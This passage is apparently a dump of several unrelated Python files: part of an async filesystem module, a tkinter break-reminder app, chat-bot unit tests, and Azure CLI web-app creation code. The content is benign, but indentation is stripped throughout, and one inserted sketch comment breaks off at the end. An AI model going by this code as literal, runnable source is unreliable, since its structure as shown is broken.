+ "$"
)
pattern = re.sub("[*]{2}", "=PLACEHOLDER=", pattern)
pattern = re.sub("[*]", "[^/]*", pattern)
pattern = re.compile(pattern.replace("=PLACEHOLDER=", ".*"))
out = {
p: allpaths[p]
for p in sorted(allpaths)
if pattern.match(p.replace("//", "/").rstrip("/"))
}
if detail:
return out
else:
return list(out)
async def _du(self, path, total=True, maxdepth=None, **kwargs):
sizes = {}
# async for?
for f in await self._find(path, maxdepth=maxdepth, **kwargs):
info = await self._info(f)
sizes[info["name"]] = info["size"]
if total:
return sum(sizes.values())
else:
return sizes
async def _find(self, path, maxdepth=None, withdirs=False, **kwargs):
path = self._strip_protocol(path)
out = dict()
detail = kwargs.pop("detail", False)
# async for?
async for _, dirs, files in self._walk(path, maxdepth, detail=True, **kwargs):
if withdirs:
files.update(dirs)
out.update({info["name"]: info for name, info in files.items()})
if not out and (await self._isfile(path)):
# walk works on directories, but find should also return [path]
# when path happens to be a file
out[path] = {}
names = sorted(out)
if not detail:
return names
else:
return {name: out[name] for name in names}
async def _expand_path(self, path, recursive=False, maxdepth=None):
if isinstance(path, str):
out = await self._expand_path([path], recursive, maxdepth)
else:
# reduce depth on each recursion level unless None or 0
maxdepth = maxdepth if not maxdepth else maxdepth - 1
out = set()
path = [self._strip_protocol(p) for p in path]
for p in path: # can gather here
if has_magic(p):
bit = set(await self._glob(p))
out |= bit
if recursive:
out |= set(
await self._expand_path(
list(bit), recursive=recursive, maxdepth=maxdepth
)
)
continue
elif recursive:
rec = set(await self._find(p, maxdepth=maxdepth, withdirs=True))
out |= rec
if p not in out and (recursive is False or (await self._exists(p))):
# should only check once, for the root
out.add(p)
if not out:
raise FileNotFoundError(path)
return list(sorted(out))
async def _mkdir(self, path, create_parents=True, **kwargs):
pass # not necessary to implement, may not have directories
async def _makedirs(self, path, exist_ok=False):
pass # not necessary to implement, may not have directories
def mirror_sync_methods(obj):
"""Populate sync and async methods for obj
For each method, a sync version is created if the name refers to an async method
(coroutine) and there is no override in the child class; an async method is
created for the corresponding sync method if there is no implementation.
Uses the methods specified in
- async_methods: the set that an implementation is expected to provide
- default_async_methods: that can be derived from their sync version in
AbstractFileSystem
- AsyncFileSystem: async-specific default coroutines
"""
from fsspec import AbstractFileSystem
for method in async_methods + dir(AsyncFileSystem):
if not method.startswith("_"):
continue
smethod = method[1:]
if private.match(method):
isco = inspect.iscoroutinefunction(getattr(obj, method, None))
unsync = getattr(getattr(obj, smethod, False), "__func__", None)
is_default = unsync is getattr(AbstractFileSystem, smethod, "")
if isco and is_default:
mth = sync_wrapper(getattr(obj, method), obj=obj)
setattr(obj, smethod, mth)
if not mth.__doc__:
mth.__doc__ = getattr(
getattr(AbstractFileSystem, smethod, None), "__doc__", ""
)
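# Illustrative sketch (not part of the original module): a backend that only
# implements the underscored coroutine gets the blocking counterpart generated
# for it by mirror_sync_methods(), since cat_file is still the default
# AbstractFileSystem implementation.
def _example_mirrored_backend():
    class _ExampleAsyncFS(AsyncFileSystem):
        async def _cat_file(self, path, start=None, end=None, **kwargs):
            return b"example data"
    fs = _ExampleAsyncFS()
    mirror_sync_methods(fs)
    # fs.cat_file("some/path") now runs _cat_file on the fsspec IO loop
    return fs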
class FSSpecCoroutineCancel(Exception):
pass
def _dump_running_tasks(
printout=True, cancel=True, exc=FSSpecCoroutineCancel, with_task=False
):
import traceback
if PY36:
raise NotImplementedError("Do not call this on Py 3.6")
tasks = [t for t in asyncio.tasks.all_tasks(loop[0]) if not t.done()]
if printout:
[task.print_stack() for task in tasks]
out = [
{
"locals": task._coro.cr_frame.f_locals,
"file": task._coro.cr_frame.f_code.co_filename,
"firstline": task._coro.cr_frame.f_code.co_firstlineno,
"linelo": task._coro.cr_frame.f_lineno,
"stack": traceback.format_stack(task._coro.cr_frame),
"task": task if with_task else None,
}
for task in tasks
]
if cancel:
for t in tasks:
cbs = t._callbacks
t.cancel()
asyncio.futures.Future.set_exception(t, exc)
asyncio.futures.Future.cancel(t)
[cb[0](t) for cb in cbs] # cancels any dependent concurrent.futures
try:
t._coro.throw(exc) # exits coro, unless explicitly handled
except exc:
pass
return out
|
breaks.py
|
from tkinter import *
from utility import *
from tkinter import messagebox
import time
import threading
from win10toast import ToastNotifier
toast = ToastNotifier()
def main(root, WIDTH, HEIGHT, wu, hu):
global productiveTimeEntry, breakTimeEntry, currentStatusLabel
root.config(bg = "black")
heading = Label(root, text = "Notifications", font = ( "", int(calculateFontSize(WIDTH, hu*20) * 1.5)), fg = "black", bg = "#bdbdbd")
heading.place(x = 0, y = 0, width = WIDTH, height = hu*20)
productiveTimeLabel = Label(root, text = "Enter the amount of time(in minutes) between breaks", font = ( "", int(calculateFontSize(wu*70, hu*15) )), fg = "white", bg = "black", justify = LEFT)
productiveTimeLabel.place(x = 5*wu, y = 25*hu, height = hu*10)
productiveTimeEntry = Entry(root, font = ("", int(calculateFontSize(wu * 90, hu*10)*2/3)), highlightbackground="red")
productiveTimeEntry.place(x = 5*wu, y = 35*hu, width = wu*90, height = hu*10)
breakTimeLabel = Label(root, text = "Enter the length(in minutes) of breaks", font = ( "", int(calculateFontSize(wu*70, hu*15) )), fg = "white", bg = "black", justify = LEFT)
breakTimeLabel.place(x = 5*wu, y = 45*hu, height = hu*10)
breakTimeEntry = Entry(root, font = ("", int(calculateFontSize(wu * 90, hu*10)*2/3)), highlightbackground="red")
breakTimeEntry.place(x = 5*wu, y = 55*hu, width = wu*90, height = hu*10)
currentStatusLabel = Label(root, text = "Current Status : N/A", font = ( "", int(calculateFontSize(wu*40, hu*10) )), fg = "white", bg = "black", justify = LEFT)
currentStatusLabel.place(x = 5*wu, y = 65*hu, height = hu*10)
helpButton = standardButton(root, "Not Working? Click For Help", lambda : showHelp(root, WIDTH, HEIGHT), wu*50, hu*8)
helpButton.place(x = wu*55, width = wu*40, height = hu*8, y = 65*hu)
startButton = RoundedButton(root, "black", 25*wu, 25*hu, "Start", int(calculateFontSize(25*wu, 25*hu)*1.2), startNotifications, "#00ff6e")
startButton.place(x = 5*wu, y = 75*hu, width = 25*wu, height = 25*hu)
backButton = RoundedButton(root, "black", 30*wu, 25*hu, "Go Back", int(calculateFontSize(30*wu, 25*hu)*1.2), root.place_forget, "#00bbff")
backButton.place(x = 35*wu, y = 75*hu, width = 30*wu, height = 25*hu)
stopButton = RoundedButton(root, "black", 25*wu, 25*hu, "Stop", int(calculateFontSize(25*wu, 25*hu)*1.2), stopNotifications, "#00ff6e")
stopButton.place(x = 70*wu, y = 75*hu, width = 25*wu, height = 25*hu)
root.mainloop()
def showNotifications(title, description):
showNotification = threading.Thread(target = lambda : toast.show_toast(title, description))
showNotification.start()
return showNotification
def startNotifications():
showNotifications("Notifications On", "You will recieve notifications like this for taking breaks")
userNotificationData = {
"notifications":{"showNotifications":True}
}
modifyUserActivity(userNotificationData)
def checkToLeave(lengthOfBreak):
start = time.time()
if lengthOfBreak == "":
messagebox.showinfo("Error", "Enter a valid time")
return True
while time.time() - start < float(lengthOfBreak) * 60:
time.sleep(1)
if not getUserActivity()["notifications"]["showNotifications"]:
return True
return False
def notificationCycle(productiveTime, breakTime):
while True:
currentStatusLabel['text'] = "Working Time"
if checkToLeave(productiveTime):break
showNotifications("Break Time", "It is time to take a break")
currentStatusLabel['text'] = "Break Time"
if checkToLeave(breakTime):break
showNotifications("Break Over", "the break is now over, please continue your work")
notificationCycleThread = threading.Thread(target = lambda : notificationCycle(productiveTimeEntry.get(), breakTimeEntry.get()))
notificationCycleThread.start()
def stopNotifications():
data = getUserActivity()["notifications"]
if data["showNotifications"]:
userNotificationData = {
"notifications":{"showNotifications":False}
}
modifyUserActivity(userNotificationData)
time.sleep(3)
showNotifications("Notifications Off", "The notifications are now turned off")
def showHelp(root, WIDTH, HEIGHT):
wu, hu = WIDTH/100, HEIGHT/100
aboutText = """
This feature helps users stay focused by scheduling regular breaks. Enter the amount of time you want to work
between breaks and the length of each break, then click start. The program begins in the working state; after the
specified working time it sends a notification saying that it is time to take a break. Once the break is over it
sends another notification asking you to continue working. This cycle repeats until you stop it or close the
application.
If you don't get any notifications after clicking start, your Windows settings may not allow applications to show
notifications. To enable them, open the "Notifications & actions" settings (search for it in the Windows search
bar) and turn on notifications from apps and other senders.
"""
aboutScreen = Frame(root, bg = "black")
aboutScreen.place(x = 0, y = 0, width = WIDTH, height = HEIGHT)
title = Label(aboutScreen, text = "Help with Notifications", font = ("", calculateFontSize(WIDTH, hu*25)), fg = "white", bg = "black")
title.place(x = 0, y = 0, height = hu*25, width = WIDTH)
showDescription = Label(aboutScreen, text = aboutText, font = ("", int(calculateFontSize(wu*90, hu*45)*2/5)), justify = "left")
showDescription.place(x = 5*wu, y = hu*25, width = wu*90, height = 50*hu)
backButton = assistButton(aboutScreen, "Go Back", aboutScreen.place_forget, 70*wu, 15*hu)
backButton.place(x = 15*wu, width = 70*wu, y = 80*hu, height = 15*hu)
|
test_chatcommunicate.py
|
# coding=utf-8
import chatcommunicate
import chatcommands
from globalvars import GlobalVars
from datahandling import _remove_pickle
import collections
import io
import os
import os.path
import pytest
import threading
import time
import yaml
from fake import Fake
from unittest.mock import Mock, patch
def test_validate_yaml():
with open("rooms.yml", "r") as f:
room_data = yaml.safe_load(f.read())
with open("users.yml", "r") as f:
user_data = yaml.safe_load(f.read())
flatten = lambda l: [item for sublist in l for item in sublist]
privileged_users = []
for site, site_rooms in room_data.items():
for room_id, room in site_rooms.items():
if "privileges" not in room:
continue
if "additional" in room["privileges"]:
privileged_users.append(room["privileges"]["additional"])
if "inherit" not in room["privileges"]:
privileged_users.append(room["privileges"])
privileged_users = set(flatten(privileged_users))
for uid in privileged_users:
if uid not in user_data:
pytest.fail("Privileged user {} does not have a corresponding entry in users.yml".format(uid))
def test_parse_room_config():
chatcommunicate.parse_room_config("test/test_rooms.yml")
assert ("stackexchange.com", 11540) in chatcommunicate._command_rooms
assert ("stackexchange.com", 30332) in chatcommunicate._command_rooms
assert ("stackoverflow.com", 111347) in chatcommunicate._command_rooms
assert ("stackexchange.com", 3) not in chatcommunicate._command_rooms
assert ("stackexchange.com", 54445) not in chatcommunicate._command_rooms
assert ("meta.stackexchange.com", 89) not in chatcommunicate._command_rooms
assert ("stackexchange.com", 11540) in chatcommunicate._watcher_rooms
assert ("stackexchange.com", 3) in chatcommunicate._watcher_rooms
assert ("meta.stackexchange.com", 89) in chatcommunicate._watcher_rooms
assert ("stackexchange.com", 30332) not in chatcommunicate._watcher_rooms
assert ("stackexchange.com", 54445) not in chatcommunicate._watcher_rooms
assert ("stackoverflow.com", 111347) not in chatcommunicate._watcher_rooms
assert chatcommunicate._privileges[("stackexchange.com", 11540)] == {121520, 10145}
assert chatcommunicate._privileges[("stackexchange.com", 30332)] == {121520, 10145}
assert chatcommunicate._privileges[("stackexchange.com", 3)] == set()
assert chatcommunicate._privileges[("stackexchange.com", 54445)] == set()
assert chatcommunicate._privileges[("meta.stackexchange.com", 89)] == {262823}
assert chatcommunicate._privileges[("stackoverflow.com", 111347)] == {3160466, 603346}
assert len(chatcommunicate._room_roles) == 5
assert chatcommunicate._room_roles["debug"] == {("stackexchange.com", 11540)}
assert chatcommunicate._room_roles["all"] == {("stackexchange.com", 11540),
("stackexchange.com", 54445),
("stackoverflow.com", 111347)}
assert chatcommunicate._room_roles["metatavern"] == {("meta.stackexchange.com", 89)}
assert chatcommunicate._room_roles["delay"] == {("meta.stackexchange.com", 89)}
assert chatcommunicate._room_roles["no-all-caps title"] == {("meta.stackexchange.com", 89)}
@patch("chatcommunicate.threading.Thread")
@patch("chatcommunicate.Client")
@patch("chatcommunicate.parse_room_config")
def test_init(room_config, client_constructor, thread):
client = Mock()
client_constructor.return_value = client
client.login.side_effect = Exception()
# https://stackoverflow.com/questions/23337471/
with pytest.raises(Exception) as e:
chatcommunicate.init("shoutouts", "to simpleflips", try_cookies=False)
assert str(e.value).endswith("Failed to log into {}, max retries exceeded".format(next(iter(chatcommunicate._clients))))
client.login.side_effect = None
client.login.reset_mock()
client_constructor.reset_mock()
room_config.side_effect = lambda _: room_config.get_original()("test/test_rooms.yml")
GlobalVars.standby_mode = True
# See GitHub Issue #2498, temporary workaround
try:
chatcommunicate.init("shoutouts", "to simpleflips", try_cookies=False)
except Exception:
return # This interferes with the following tests
assert len(chatcommunicate._rooms) == 0
assert client_constructor.call_count == 3
client_constructor.assert_any_call("stackexchange.com")
client_constructor.assert_any_call("stackoverflow.com")
client_constructor.assert_any_call("meta.stackexchange.com")
assert thread.call_count == 2
thread.assert_any_call(name="pickle ---rick--- runner", target=chatcommunicate.pickle_last_messages, daemon=True)
thread.assert_any_call(name="message sender", target=chatcommunicate.send_messages, daemon=True)
client.login.reset_mock()
client_constructor.reset_mock()
thread.reset_mock()
GlobalVars.standby_mode = False
counter = 0
def throw_every_other(*_):
nonlocal counter
counter += 1
if counter & 1:
raise Exception()
client.login.side_effect = throw_every_other
# See GitHub Issue #2498, temporary workaround
try:
chatcommunicate.init("shoutouts", "to simpleflips", try_cookies=False)
except Exception:
return # Because this causes the following checks to fail
assert client_constructor.call_count == 3
client_constructor.assert_any_call("stackexchange.com")
client_constructor.assert_any_call("stackoverflow.com")
client_constructor.assert_any_call("meta.stackexchange.com")
assert thread.call_count == 2
thread.assert_any_call(name="pickle ---rick--- runner", target=chatcommunicate.pickle_last_messages, daemon=True)
thread.assert_any_call(name="message sender", target=chatcommunicate.send_messages, daemon=True)
assert len(chatcommunicate._rooms) == 3
assert chatcommunicate._rooms[("stackexchange.com", 11540)].deletion_watcher is True
assert chatcommunicate._rooms[("stackexchange.com", 30332)].deletion_watcher is False
assert chatcommunicate._rooms[("stackoverflow.com", 111347)].deletion_watcher is False
@pytest.mark.skipif(os.path.isfile("messageData.p"), reason="shouldn't overwrite file")
@patch("chatcommunicate.pickle.dump")
def test_pickle_rick(dump):
try:
threading.Thread(target=chatcommunicate.pickle_last_messages, daemon=True).start()
chatcommunicate._pickle_run.set()
# Yield to the pickling thread until it acquires the lock again
while len(chatcommunicate._pickle_run._cond._waiters) == 0:
time.sleep(0)
assert dump.call_count == 1
call, _ = dump.call_args_list[0]
assert isinstance(call[0], chatcommunicate.LastMessages)
assert isinstance(call[1], io.IOBase) and call[1].name == "messageData.p"
finally:
_remove_pickle("messageData.p")
@patch("chatcommunicate._pickle_run")
def test_message_sender(pickle_rick):
chatcommunicate._last_messages = chatcommunicate.LastMessages({}, collections.OrderedDict())
threading.Thread(target=chatcommunicate.send_messages, daemon=True).start()
room = chatcommunicate.RoomData(Mock(), -1, False)
room.room.id = 11540
room.room._client.host = "stackexchange.com"
room.room._client._do_action_despite_throttling.return_value = Fake({"json": lambda: {"id": 1}})
chatcommunicate._msg_queue.put((room, "test", None))
while not chatcommunicate._msg_queue.empty():
time.sleep(0)
room.room._client._do_action_despite_throttling.assert_called_once_with(("send", 11540, "test"))
room.room.reset_mock()
assert chatcommunicate._last_messages.messages[("stackexchange.com", 11540)] == collections.deque((1,))
room.room.id = 30332
room.room._client._do_action_despite_throttling.return_value = Fake({"json": lambda: {"id": 2}})
chatcommunicate._msg_queue.put((room, "test", "did you hear about what happened to pluto"))
while not chatcommunicate._msg_queue.empty():
time.sleep(0)
room.room._client._do_action_despite_throttling.assert_called_once_with(("send", 30332, "test"))
assert chatcommunicate._last_messages.messages[("stackexchange.com", 11540)] == collections.deque((1,))
assert chatcommunicate._last_messages.reports == collections.OrderedDict({("stackexchange.com", 2): "did you hear about what happened to pluto"})
@patch("chatcommunicate._msg_queue.put")
@patch("chatcommunicate.get_last_messages")
def test_on_msg(get_last_messages, post_msg):
client = Fake({
"_br": {
"user_id": 1337
},
"host": "stackexchange.com"
})
room_data = chatcommunicate.RoomData(Mock(), -1, False)
chatcommunicate._rooms[("stackexchange.com", 11540)] = room_data
chatcommunicate.on_msg(Fake({}, spec=chatcommunicate.events.MessageStarred), None) # don't reply to events we don't care about
msg1 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1,
},
"parent": None,
"content": "shoutouts to simpleflips"
}
}, spec=chatcommunicate.events.MessagePosted)
chatcommunicate.on_msg(msg1, client)
msg2 = Fake({
"message": {
"room": {
"id": 11540
},
"owner": {
"id": 1337
},
"id": 999,
"parent": None,
"content": "!!/not_actually_a_command"
}
}, spec=chatcommunicate.events.MessagePosted)
chatcommunicate.on_msg(msg2, client)
msg3 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"id": 999,
"parent": None,
"content": "!!/a_command"
}
}, spec=chatcommunicate.events.MessagePosted)
mock_command = Mock(side_effect=lambda *_, **kwargs: "hi" if not kwargs["quiet_action"] else "")
chatcommunicate._prefix_commands["a_command"] = (mock_command, (0, 0))
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 hi"
mock_command.assert_called_once_with(original_msg=msg3.message, alias_used="a_command", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command-"
chatcommunicate.on_msg(msg3, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with(original_msg=msg3.message, alias_used="a_command", quiet_action=True)
post_msg.reset_mock()
mock_command.reset_mock()
chatcommunicate._prefix_commands["a_command"] = (mock_command, (0, 1))
chatcommunicate.on_msg(msg3, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with(None, original_msg=msg3.message, alias_used="a_command", quiet_action=True)
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command 1 2 3"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 hi"
mock_command.assert_called_once_with("1 2 3", original_msg=msg3.message, alias_used="a_command", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
chatcommunicate._prefix_commands["a_command"] = (mock_command, (1, 2))
msg3.message.content = "!!/a_command"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 Too few arguments."
mock_command.assert_not_called()
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command 1 2 oatmeal"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 Too many arguments."
mock_command.assert_not_called()
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command- 1 2"
chatcommunicate.on_msg(msg3, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with("1", "2", original_msg=msg3.message, alias_used="a_command", quiet_action=True)
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command 3"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 hi"
mock_command.assert_called_once_with("3", None, original_msg=msg3.message, alias_used="a_command", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
msg4 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"parent": {
"owner": {
"id": 2
}
},
"id": 1000,
"content": "asdf"
}
}, spec=chatcommunicate.events.MessageEdited)
chatcommunicate.on_msg(msg4, client)
msg5 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"parent": {
"owner": {
"id": 1337
}
},
"id": 1000,
"content": "@SmokeDetector why "
}
}, spec=chatcommunicate.events.MessageEdited)
chatcommunicate._reply_commands["why"] = (mock_command, (0, 0))
threw_exception = False
try:
chatcommunicate.on_msg(msg5, client)
except AssertionError:
threw_exception = True
assert threw_exception
mock_command.assert_not_called()
post_msg.assert_not_called()
chatcommunicate._reply_commands["why"] = (mock_command, (1, 1))
chatcommunicate.on_msg(msg5, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":1000 hi"
mock_command.assert_called_once_with(msg5.message.parent, original_msg=msg5.message, alias_used="why", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
msg5.message.content = "@SmokeDetector why@!@#-"
chatcommunicate.on_msg(msg5, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with(msg5.message.parent, original_msg=msg5.message, alias_used="why", quiet_action=True)
msg6 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"id": 1000,
"parent": None,
"content": "sd why - 2why 2why- 2- why- "
}
}, spec=chatcommunicate.events.MessageEdited)
get_last_messages.side_effect = lambda _, num: (Fake({"id": i}) for i in range(num))
chatcommunicate.on_msg(msg6, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":1000 [:0] hi\n[:1] <skipped>\n[:2] hi\n[:3] hi\n[:4] <processed without return value>\n[:5] <processed without return value>\n[:6] <skipped>\n[:7] <skipped>\n[:8] <processed without return value>"
def test_message_type():
fake1 = Fake({}, spec=chatcommunicate.Message)
assert chatcommands.message(fake1) == fake1
fake2 = Fake({})
threw_exception = False
try:
chatcommands.message(fake2)
except AssertionError:
threw_exception = True
assert threw_exception
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from http import HTTPStatus
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo, DefaultErrorResponseException
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent
from azure.cli.core.profiles import ResourceType, get_sdk
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities.
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# Keep the existing app settings when a webapp with this name already exists.
name_validation = client.check_name_availability(name, 'Site')
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# portal uses the current_stack property in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a helper method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
if current_stack:
app_metadata = client.web_apps.list_metadata(resource_group_name, name)
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group_name, name, kind="app", properties=app_metadata.properties)
# Ensure SCC operations follow right after the 'create', with no preceding appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # only one of these options can be specified
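# Illustrative sketch (hypothetical values, not part of the original module) of how the validation behaves:
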